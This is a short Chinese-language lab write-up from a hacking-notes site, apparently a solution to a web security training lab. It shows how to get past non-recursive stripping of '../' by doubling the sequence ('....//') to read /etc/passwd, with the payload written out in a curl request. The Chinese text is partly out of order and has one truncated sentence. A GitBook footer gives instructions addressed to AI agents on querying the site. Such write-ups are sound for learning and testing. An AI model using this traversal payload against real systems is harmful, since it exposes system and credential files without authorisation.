> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/web/path-traversal/file-path-traversal-traversal-sequences-removed-without-recursive-processing.md).

# 文件路径遍历：移除遍历序列且不进行递归处理

### 文件路径遍历，遍历序列被非递归地移除

因此，一个可用的有效载荷会使用如下字符串：

由于代码会移除 `../` 这些出现的内容，因此可以通过以下方式绕过该机制： **将点和斜杠加倍**。当被过滤的序列被移除后，总会剩下一部分可用内容。

目标是恢复该……的内容 **/etc/passwd** 文件中的用户进行测试。

应用程序会移除用户提供的遍历序列（`../`）但它这样做是 **非递归地**.

```bash
....//....//....//....//etc/passwd
```

示例： **curl**:

{% code overflow="wrap" %}

```bash
curl 'https://0ae0005c04ab83ac82531f6d002300a2.web-security-academy.net/image?filename=....//....//....//....//....//etc/passwd'
```

{% endcode %}

<figure><img src="/files/3a5ef01ba06db4a79c1820441399c03da1880cfb" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/web/path-traversal/file-path-traversal-traversal-sequences-removed-without-recursive-processing.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
